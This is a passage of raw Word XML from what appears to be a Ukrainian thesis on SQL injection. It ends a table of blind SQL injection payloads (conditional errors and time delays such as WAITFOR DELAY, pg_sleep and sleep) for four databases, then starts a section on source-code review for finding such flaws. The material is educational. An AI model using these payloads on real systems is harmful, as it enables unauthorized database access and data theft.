          <w:p w14:paraId="5C7D7ED4" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E1666" w:rsidRPr="00C86D02" w14:paraId="07B799A1" w14:textId="77777777" w:rsidTr="002F1513">
        <w:trPr>
          <w:trHeight w:val="330"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21268917" w14:textId="48B45E37" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005027FB">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08733332" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="467FB3C5" w14:textId="0CE650CF" w:rsidR="004E1666" w:rsidRPr="005027FB" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005027FB">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42834CC6" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005027FB">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t>SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C2065A8" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71E8B6BE" w14:textId="7645662C" w:rsidR="004E1666" w:rsidRPr="005027FB" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005027FB">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E1666" w14:paraId="3C23E89F" w14:textId="77777777" w:rsidTr="002F1513">
        <w:trPr>
          <w:trHeight w:val="330"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E0E91A6" w14:textId="2855F72F" w:rsidR="004E1666" w:rsidRPr="005027FB" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005027FB">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>dbms_pipe.receive_message(('a'),10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A81B5E7" w14:textId="019E7033" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>WAITFOR DELAY '0:0:10'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FF69587" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01D31837" w14:textId="54210475" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>SELECT pg_sleep(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26A54AF5" w14:textId="4A8F453D" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SELECT sleep(10)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A54A3FD" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1397D74F" w14:textId="6ACD242D" w:rsidR="00B72CB3" w:rsidRDefault="00B72CB3" w:rsidP="00B72CB3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF1D15A" w14:textId="09F93F0B" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="00B72CB3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F43834" w14:textId="19C2C4DD" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="00B72CB3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60070FA6" w14:textId="09F04A72" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="00B72CB3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6264A38C" w14:textId="49E30B2C" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="00B72CB3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EDE6873" w14:textId="14C450D9" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="002F1513">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Закінчення таблиці 2.2</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ae"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2407"/>
        <w:gridCol w:w="2407"/>
        <w:gridCol w:w="2407"/>
        <w:gridCol w:w="2407"/>
      </w:tblGrid>
      <w:tr w:rsidR="002F1513" w14:paraId="4479F1CF" w14:textId="77777777" w:rsidTr="002F1513">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BD135CE" w14:textId="1823249E" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="002F1513">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E1666">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="540A20DD" w14:textId="17408CDB" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="002F1513">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E1666">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>Microsoft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="239B9009" w14:textId="22685DAA" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="002F1513">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E1666">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21F16344" w14:textId="18DE0DC4" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="002F1513">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E1666">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F1513" w:rsidRPr="00C86D02" w14:paraId="4F089456" w14:textId="77777777" w:rsidTr="002F1513">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="153E5E54" w14:textId="618DDA8F" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="002F1513">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005027FB">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A0678D1" w14:textId="77777777" w:rsidR="002F1513" w:rsidRPr="002F1513" w:rsidRDefault="002F1513" w:rsidP="002F1513">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005027FB">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14B584F9" w14:textId="77777777" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="002F1513">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12BB10BD" w14:textId="0555ADBD" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="002F1513">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005027FB">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42F6EDE6" w14:textId="77777777" w:rsidR="002F1513" w:rsidRPr="002F1513" w:rsidRDefault="002F1513" w:rsidP="002F1513">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005027FB">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="161159EA" w14:textId="77777777" w:rsidR="002F1513" w:rsidRPr="002F1513" w:rsidRDefault="002F1513" w:rsidP="002F1513">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D7DD2B1" w14:textId="77777777" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="002F1513">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="350D7742" w14:textId="77777777" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="00B72CB3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9DCC0C" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="0068107F" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46A9CF03" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="001E06E1" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc516752136"/>
      <w:bookmarkStart w:id="63" w:name="_Toc30433120"/>
      <w:r w:rsidRPr="001E06E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.5.4 Огляд вихідного коду для виявлення вразливості до SQL-ін’єкцій</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="7B777A15" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="0068107F" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31936939" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Огляд вихідного коду - це метод перевірки безпеки, що включає систематичне вивчення вихідного коду</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>для різних типів вразливості. Його призначення в виявленні і виправленні помилок зроблених програмістами</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">продовж фази розробки. Ця перевірка допомагає в знаходженні і видаленні уразливості таких як </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, витік пам’яті і переповнення буфера, з додатку. Автоматизовані інструменти такі як </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Source</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Analyzer</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secure</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HPQA</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inspect</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sca</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ner</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF04F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
